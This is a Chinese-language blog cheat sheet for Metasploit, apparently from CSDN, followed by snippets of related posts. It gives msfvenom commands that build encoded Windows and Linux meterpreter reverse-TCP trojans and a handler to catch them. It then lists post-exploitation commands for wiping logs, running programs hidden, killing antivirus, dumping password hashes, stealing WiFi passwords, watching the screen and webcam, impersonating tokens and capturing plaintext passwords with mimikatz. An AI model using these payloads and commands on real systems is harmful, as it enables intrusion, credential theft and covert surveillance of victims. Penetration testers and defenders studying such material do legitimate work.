msf常用命令

最新推荐文章于 2025-03-20 00:03:22 发布
最新推荐文章于 2025-03-20 00:03:22 发布
阅读量2.1k 收藏 14
点赞数 3
分类专栏: web 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTtiandd/article/details/107348015
版权
本文介绍了Metasploit框架中msfvenom的使用方法,包括生成不同平台的payload、设置参数以及如何在msfconsole中进行交互。重点讲解了基础命令如背景切换、会话管理、文件操作、权限检查、进程迁移等,还提到了一些高级功能如密码抓取、WiFi密码查看、屏幕监控等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

msfvenom:生成payload工具 

常用参数:-l查看列表

-p 指定payload

-f指定输出格式

-e指定一个编码方式

-i 指定编码次数

例如生成一个反向tcp的payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe

上面是生成Windows可执行文件,也可以生成Linux的可执行文件

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -f elf > 1.elf

 

由上面生成的可执行木马文件可以上传至攻击方,令其执行在本地监听即可:

进入msfconsole

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.139.130

   set LPORT 4444

  exploit

然后再被攻击的电脑执行即可获得meterpreter会话窗口:

 

基础命令

返回命令:background

查看所有会话命令:sessions -l

 pessions -i:与指定的会话进行交互

 pwd:查看目标当前那目录

 lpwd:本地的当前目录

 cd :切换指定目录

 lcd :切换本地指定目录

 ls :列出目标的文件

 lls :列出本机当前目录文件

 clearev : 清理痕迹

 download :将目标文件下载到本地

  upload:上传至目标当前目录 :upload 1.exe

  execute:在目标执行命令的功能 隐藏执行:execute -f 目标.exe -H

 ps : 列出目标进程

 getuid: 查看当前用户的身份

 getprivs:查看当前权限

 migrate :进程迁移

 getpid :查看木马进程

 shell :进入目标终端环境 会有乱码

 chcp 65001解决乱码问题

 idletime :查看目标服务空闲时间

 sysinfo : 查看目标信息

 shutdown:关机

 reboot :重启

 netstat:查看网络连接情况

 ipconfig:查看目标IP信息

 getsystem:尝试提权

 killav :杀死杀毒软件

 run hashdump :到处目标机的密码

 run post/windows/wlan/wlan_profile :查看wifi密码

 run vnc:实时屏幕监控

 run webcam :开启一个摄像头

 run post/windows/gather/checkvm:查看是否为虚拟机

  run post/windows/gather/enum_computers :查看域内主机

 run post/windows/manage/enable_edp:开启对方远程桌面3389

 利用help可了解更多

 load incognito 然后使用 list_tokens -u 列出令牌

 impersonate_token HP-43003395852D\\Administrator :获取指定权限记住要加两个\

 mimikatz: load mimikatz进入

 help查看帮助

 wdigest:抓取明文密码

 更新命令:apt update

 apt install metasploit-framework

 

MSF常用命令
weixin_42140534的博客
08-04 4252
0x01 msf获取shell 启动 msfconsole 搜索某个模块 search ms08-067 使用某个模块 use exploit/windows/smb/ms08-067_netapi 查看当前模块可以使用的payload[可以省略] show payloads 查看当前模块需要的参数配置 show options[可略] 选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp 设置目标的IP地址 set RHOST 192
Msfconsole“MSF常用命令
2301_79977730的博客
04-27 518
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。命令:db_destroy user:passwd@host:port/database。迁移到一个指定的进程ID(PID号可通过ps命令从主机上获得)。在目标主机注册表中进行交互,创建,删除,查询等操作。命令:db_autopwn -p -r -e。以所有可用令牌来执行cmd命令并隐藏该进程。命令:sessions -s script。显示所有运行的进程以及相关联的用户账户。
Metasploit Framework命令汇总
weixin_34351321的博客
06-08 263
Metasploit Framework命令汇总 2010-11-07 01:49 Metasploit Framework命令汇总 一、msfconsole ? 帮助菜单 back 从当前环境返回...
Metasploit Framework(MSF)使用教程与命令详解
最新发布
vortex5的博客
03-20 1445
Metasploit Framework由H.D. Moore于2003年首次发布,后由Rapid7公司维护。它最初是一个漏洞利用开发框架,现已发展为包含数千个模块的综合性渗透测试平台。MSF支持多种操作系统(如Windows、Linux、macOS),通过命令行界面(MSFconsole)或图形界面(如Armitage)操作。Exploits:漏洞利用模块,用于攻击目标系统。Payloads:攻击成功后执行的代码,如反弹shell。Auxiliary:辅助模块,用于扫描、嗅探等任务。
MSF 命令
道可道,非常道;名可名,非常名。
10-17 727
一、msfconsole   ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 exit   退出MSF help   帮助菜单 info   显示一个或多个模块的信息 irb   进入irb脚本模式 jobs   显示和管理作业 kill   杀死一
MSF(Metasploit Framework)常用命令
qq_42699326的博客
12-12 1203
MSF(Metasploit Framework)是一款强大的渗透测试工具,常用于漏洞利用、后门植入和信息收集等任务。
MSF基本命令及实例
郎逸的博客
07-07 3994
这里写目录标题MSF基本架构RexMSF::CoreMSF::BasePlugin插件MSF数据库恢复数据库技术功能模块(不是流程模块)MSF基本使用和控制台命令(MSFconsole)更新地位帮助命令MSF控制台基本命令模块内基本命令数据库操作Exploit模块Active exploits(主动exploit)Passive exploits(被动exploit)生成payloadMeterpreter简介常用命令Meterpreter python扩展实例暴力破解mysql数据库密码ms08-o67经
msf命令汇总
06-21
### msf命令汇总 #### 一、MSF基础命令与说明 **msfconsole**: 启动Metasploit控制台。 - **help**: 显示所有可用的命令列表。 - **back**: 返回上一个菜单。 - **banner**: 显示当前Metasploit框架的横幅。 - **...
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2723
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
MSF常用命令(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
10-09 915
MSF常用命令(非常详细),零基础入门到精通,看这一篇就够了
msf命令
qq_52469895的博客
05-19 2489
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
Msf命令详解
weixin_53747497的博客
04-10 2532
portfwd - 将本地端口转发到远程服务 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 2135
【Metasploit】MSF常用命令
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2676
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
MSF命令大全
L_lemo004的博客
10-20 6371
0x00 Payload生成 Windows/Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名 Web PHP: msfvenom -p php/meter
MSF基础命令新手指南
weixin_43733912的博客
10-22 755
基础命令概览: back(返回): 从目前的情况下向后移动 banner:Display an awesome metasploit banner cd: 改变当前的工作目录 color: 切换颜色 connect(远程连接): 与主机通信 edit(编辑): 编辑与$ VISUAL或$ EDITOR当前模块的 exit(退出
Metasploit Framework(MSF)命令汇总
m0_57836225的博客
08-23 413
每天15篇占位。
学会MSF常用命令
12-08
以下是MSF常用命令和用法: 1. 查看有哪些命令和命令用法: ```console msf6 > ? ``` 该命令可以列出所有可用的命令和命令用法。 2. 设置变量: ```console msf6 > set <变量名> <变量值> ``` 该命令可以设置变量的值,例如: ```console msf6 > set RHOSTS 192.168.0.1 ``` 3. 运行模块: ```console msf6 > run ``` 该命令可以运行当前选定的模块。 4. 列出可用的模块: ```console msf6 > search <关键字> ``` 该命令可以列出所有包含关键字的可用模块。 5. 显示当前选定的模块信息: ```console msf6 > info ``` 该命令可以显示当前选定的模块的详细信息。 6. 设置payload: ```console msf6 > set payload <payload名称> ``` 该命令可以设置payload的名称,例如: ```console msf6 > set payload windows/meterpreter/reverse_tcp ``` 7. 设置监听器: ```console msf6 > set LHOST <本地IP地址> msf6 > set LPORT <本地端口号> ``` 该命令可以设置监听器的本地IP地址和端口号。 8. 执行扫描: ```console msf6 > db_nmap <目标IP地址> ``` 该命令可以执行对目标IP地址的扫描。 9. msf更新: ```console apt install --only-upgrade metasploit-framework ``` 该命令可以更新msf到最新版本。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leng_tian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值